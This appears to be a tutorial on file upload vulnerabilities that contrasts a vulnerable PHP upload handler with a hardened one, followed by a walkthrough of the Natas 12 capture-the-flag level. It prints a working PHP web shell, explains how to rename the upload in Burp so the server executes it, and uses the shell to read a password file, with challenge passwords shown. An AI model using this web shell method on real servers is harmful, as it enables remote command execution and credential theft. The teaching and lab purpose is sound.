Many web applications let users upload files (images, music files, documents and so on). Uploaded files carry significant risk if they are not handled securely, and the impact of a file upload vulnerability depends on how the file is processed and where it is stored.
There are two kinds of problems. The first comes from the metadata: the file name and path. If the application uses the client-supplied name when writing the file, that name can contain traversal sequences that place the file somewhere else entirely; for example, an attacker can overwrite the site's index.html by uploading a malicious file whose name is "../../../index.html". So validate the metadata very carefully before you use it. The second comes from the content of the file which, depending on where it is stored and how it is served, can let the attacker do the following:
- Obtain a web shell (when the file is stored where the server-side interpreter will execute it).
- Host a phishing page on the site's own domain.
- Plant a stored (persistent) XSS payload on the website.
- Expose uploaded sensitive content to people who were never meant to see it.
The severity is very high: attacker-chosen code can run in the server context (a web shell) or on the client side (stored XSS, phishing). The weakness is easy for an attacker to detect, because the upload form is visible and a single test upload reveals how the file is named, stored and served, and it is common in practice. Together this makes the vulnerability very serious.
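To make the two failure modes concrete, here is an added example (not code from the original write-up or from the Natas challenge): an upload handler that does what the vulnerable description above implies, beside a hardened version, both exercised offline against constructed inputs. Function names, the temporary directory layout and the extension allowlist are assumptions for the demo; a real handler would also check is_uploaded_file() and use move_uploaded_file() instead of copy(), and needs the fileinfo extension for the content check.

```php
<?php
// Added example, not from the original write-up: an upload handler that trusts
// the client (vulnerable) beside a hardened one, run offline on constructed input.
// Function names, directory layout and the allowlist are assumptions for the demo.

// VULNERABLE: the client-supplied name decides the path and the extension, and the
// content is never inspected, so "../../../index.html" escapes the upload directory
// and shell.php is stored where the interpreter will run it.
function save_upload_vulnerable(string $clientName, string $tmpPath, string $uploadDir): string
{
    $dest = $uploadDir . '/' . $clientName;
    copy($tmpPath, $dest);
    return $dest;
}

// HARDENED: allowlisted extension, content check, server-chosen name, no execute bit.
function save_upload_hardened(string $clientName, string $tmpPath, string $uploadDir, int $maxBytes = 1000000): string
{
    $allowed = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

    // 1. Metadata: only the base name is consulted (this drops any "../" prefix),
    //    and only for its extension, which must be on the allowlist.
    $base = basename(str_replace('\\', '/', $clientName));
    $ext  = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new RuntimeException("extension not allowed: '$ext'");
    }

    // 2. Content: size limit and magic-byte MIME detection, independent of the claimed name.
    $size = filesize($tmpPath);
    if ($size === false || $size === 0 || $size > $maxBytes) {
        throw new RuntimeException('bad size');
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($mime !== $allowed[$ext]) {
        throw new RuntimeException("content is $mime, not {$allowed[$ext]}");
    }

    // 3. Storage: random server-chosen name with the validated extension, inside the
    //    resolved upload directory, not executable. Even an image that smuggles PHP in
    //    a comment is harmless here because nothing ever asks the interpreter to run it.
    $dir = realpath($uploadDir);
    if ($dir === false) {
        throw new RuntimeException('upload directory missing');
    }
    $dest = $dir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(16)) . '.' . $ext;
    copy($tmpPath, $dest);
    chmod($dest, 0644);
    return $dest;
}

// Offline demo (php upload_demo.php): constructed inputs in a throwaway temp tree.
$root    = sys_get_temp_dir() . '/upload_demo_' . bin2hex(random_bytes(4));
$uploads = "$root/srv/www/uploads";
mkdir($uploads, 0755, true);
$cases = [
    'photo.gif'           => "GIF89a\x01\x00\x01\x00\x00\x00\x00;",   // minimal real GIF
    'shell.php'           => '<?php echo system($_GET["cmd"]); ?>', // web shell, honest name
    'shell.jpeg'          => '<?php echo system($_GET["cmd"]); ?>', // web shell, image name
    '../../../index.html' => '<h1>defaced</h1>',                    // traversal in the metadata
];
foreach ($cases as $name => $content) {
    $tmp = tempnam($root, 'up');
    file_put_contents($tmp, $content);
    $vuln = save_upload_vulnerable($name, $tmp, $uploads);   // traversal case lands in $root
    try {
        $result = save_upload_hardened($name, $tmp, $uploads);
    } catch (RuntimeException $e) {
        $result = 'REJECTED: ' . $e->getMessage();
    }
    printf("%-22s vulnerable -> %s\n%22s hardened   -> %s\n", $name, realpath($vuln), '', $result);
}
```

Running it shows the vulnerable handler writing index.html three directories above the upload folder and storing both shells verbatim, while the hardened handler accepts only photo.gif: shell.php fails the extension allowlist, shell.jpeg fails the content check (libmagic reports text/x-php, not image/jpeg), and the traversal name is reduced to index.html and rejected for its extension. The design point is that none of the three checks relies on the others: the allowlist stops the obvious case, the content check stops the renamed case, and the server-chosen name plus a non-executable location stop whatever the first two miss.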
To test the vulnerability locally on your own system, create a PHP file with the code below.
shell.php
<?php
// Minimal web shell: runs the command passed in the cmd query parameter and returns its output.
echo system($_GET["cmd"]);
?>
NATAS 12 :
- USERNAME : natas12
- PASSWORD : EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
The page shows an upload form. Let's use it to upload a file that gives us a shell on the website.
Create the shell.php file shown above; commands are passed to it through the cmd parameter in the URL.
Now upload the PHP file. During the upload, intercept the request (with a proxy such as Burp Suite) and change the .jpeg extension in the filename to .php; otherwise the server stores the file as an image and never executes it.
Open the link the site generates for the uploaded file and start issuing the commands you want through the cmd parameter. Once we have the shell we can do many things.
Let's list the files in the directory where the upload landed by passing cmd=ls
The output shows the files in that directory (jpg, php, etc.) uploaded by other users of the challenge.
The passwords live under /etc/natas_webpass/, one file per level. We are logged in as natas12, so the password for the next level is in the file natas13 (reading natas12 would only return the password we already used to log in).
Append the command to the URL of the uploaded shell (the random filename the site assigned, ending in .php):
.php?cmd=cat /etc/natas_webpass/natas13
This prints the password: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY
This is a basic example of a file upload vulnerability.